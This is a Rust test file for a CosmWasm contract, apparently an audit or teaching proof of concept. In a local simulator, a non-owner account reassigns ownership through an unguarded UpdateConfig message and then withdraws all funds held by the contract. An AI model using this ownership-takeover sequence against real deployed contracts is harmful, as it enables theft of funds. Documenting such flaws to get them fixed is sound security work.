use cosmwasm_std::{Addr, Coin, coin, Querier};
use cosmwasm_std::{QueryRequest, BankQuery, to_binary, from_binary, BalanceResponse};
use cw_access::contract::{execute, instantiate, query};
use cw_access::msg::{InstantiateMsg, ExecuteMsg};
use cw_multi_test::{App, ContractWrapper, Executor};
/// Credits `amount` of the native token `denom` to `beneficiary` by sending a
/// bank `Mint` message through the test app's sudo entry point.
///
/// Test-only helper used to fund an address before a scenario runs.
///
/// # Panics
/// Panics if the sudo call returns an error.
fn mint_native(app: &mut App, beneficiary: String, denom: String, amount: u128) {
    let minted = vec![coin(amount, denom)];
    let mint_msg = cw_multi_test::SudoMsg::Bank(cw_multi_test::BankSudo::Mint {
        to_address: beneficiary,
        amount: minted,
    });
    app.sudo(mint_msg).unwrap();
}
/// Returns the amount of `denom` that the bank module reports for `address`.
///
/// The request is serialized, sent through `App::raw_query`, and the binary
/// answer is decoded as a `BalanceResponse`.
///
/// # Panics
/// Panics if serialization, either result layer of the raw query, or decoding
/// of the response fails.
fn query_balance_native(app: &App, address: &Addr, denom: &str) -> Coin {
    let bank_query = BankQuery::Balance {
        address: address.to_string(),
        denom: denom.to_string(),
    };
    let request: QueryRequest<BankQuery> = QueryRequest::Bank(bank_query);
    let encoded = to_binary(&request).unwrap();
    // raw_query hands back a result nested in a result; both must be successful.
    let raw = app.raw_query(&encoded).unwrap().unwrap();
    let parsed: BalanceResponse = from_binary(&raw).unwrap();
    parsed.amount
}
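/// Pins the authorization behaviour currently observed in the `cw_access` contract.
///
/// Every message below is sent by an account ("attacker") that is not the
/// instantiating owner, and the test asserts this sequence:
/// 1. `Withdraw` is rejected.
/// 2. `UpdateConfig { owner: "attacker" }` is accepted.
/// 3. `Withdraw` is then accepted and the 100 ATOM held by the contract end up
///    with the sender.
///
/// Step 2 is the finding: a non-owner can reassign ownership, which makes the
/// rejection in step 1 ineffective.
/// NOTE(review): the handler is not visible in this file; presumably
/// `UpdateConfig` does not compare the message sender with the stored owner —
/// confirm in `cw_access::contract::execute`. Once that check is in place,
/// steps 2 and 3 should be asserted with `is_err()` and the contract should
/// keep its balance.
#[test]
fn insufficient_access_control_test() {
    const DENOM: &str = "ATOM";
    const FUNDS: u128 = 100;

    let owner = Addr::unchecked("owner");
    let attacker = Addr::unchecked("attacker");

    let mut app = App::default();
    let code = ContractWrapper::new(execute, instantiate, query);
    let code_id = app.store_code(Box::new(code));

    // The contract has no real-life functionality: it can change its own
    // config and send its current balance to a chosen receiver.
    let contract_addr = app
        .instantiate_contract(
            code_id,
            owner.clone(),
            &InstantiateMsg { owner: owner.to_string() },
            &[],
            "Contract",
            None,
        )
        .unwrap();

    mint_native(&mut app, contract_addr.to_string(), DENOM.to_string(), FUNDS);

    // Preconditions: all funds sit in the contract and the non-owner holds
    // nothing, so the final balance check can only be explained by a transfer
    // out of the contract.
    assert_eq!(coin(FUNDS, DENOM), query_balance_native(&app, &contract_addr, DENOM));
    assert_eq!(coin(0, DENOM), query_balance_native(&app, &attacker, DENOM));

    let withdraw = ExecuteMsg::Withdraw { destination: attacker.to_string() };

    // Step 1: a withdrawal by a non-owner must be refused.
    let withdraw_res = app.execute_contract(attacker.clone(), contract_addr.clone(), &withdraw, &[]);
    println!("{:?}", withdraw_res.as_ref());
    assert!(withdraw_res.is_err(), "Withdraw from a non-owner was expected to be rejected");

    // Step 2: the same non-owner replaces the owner in the config. Asserting
    // before unwrapping keeps the failure message meaningful when the contract
    // starts rejecting this call.
    let update_res = app.execute_contract(
        attacker.clone(),
        contract_addr.clone(),
        &ExecuteMsg::UpdateConfig { owner: attacker.to_string() },
        &[],
    );
    assert!(
        update_res.is_ok(),
        "UpdateConfig from a non-owner was rejected: {:?}",
        update_res.as_ref().err()
    );
    println!("{:?}", update_res.as_ref().unwrap());

    // Step 3: the withdrawal that failed in step 1 now passes the owner check.
    let withdraw_success_res =
        app.execute_contract(attacker.clone(), contract_addr.clone(), &withdraw, &[]);
    assert!(
        withdraw_success_res.is_ok(),
        "Withdraw after the ownership change was rejected: {:?}",
        withdraw_success_res.as_ref().err()
    );
    println!("{:?}", withdraw_success_res.as_ref().unwrap());

    // Postconditions: the full amount moved from the contract to the sender.
    assert_eq!(coin(FUNDS, DENOM), query_balance_native(&app, &attacker, DENOM));
    assert_eq!(coin(0, DENOM), query_balance_native(&app, &contract_addr, DENOM));
}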